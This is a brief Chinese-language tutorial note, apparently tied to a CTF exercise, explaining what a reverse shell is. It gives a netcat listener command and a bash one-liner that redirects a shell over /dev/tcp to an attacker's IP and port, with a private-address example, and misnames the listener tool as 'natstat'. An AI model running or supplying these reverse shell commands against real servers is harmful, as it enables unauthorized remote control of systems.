#什么是反弹shell
通常我们对一个开启了80端口的服务器进行访问时,就会建立起与服务器Web服务链接,从而获取到服务器相应的Web服务。而反弹shell是我们开启一个端口进行监听,转而让服务器主动反弹一个shell来连接我们的主机,我们再通过接收到的shell进而来远程控制服务器。
反弹shell命令
首先本地进行监听:
主要是用natstat命令(也可以利用程序监听)
nc -lk 35436
从被攻击服务器上发起命令如下:
bash -i > /dev/tcp/{你的ip}/{你监听的端口} 0>&1 2>&1
例如:
bash -i >/dev/tcp/192.168.0.46/35436 0>&1 2>&1
我们的主机就会自动登录到远程机器的bash上
![[dasctf]misc3 chrchrchr.pcapng](https://img-blog.csdnimg.cn/bcecd8b6d2ec4acd89eb99c14ca093c8.png)
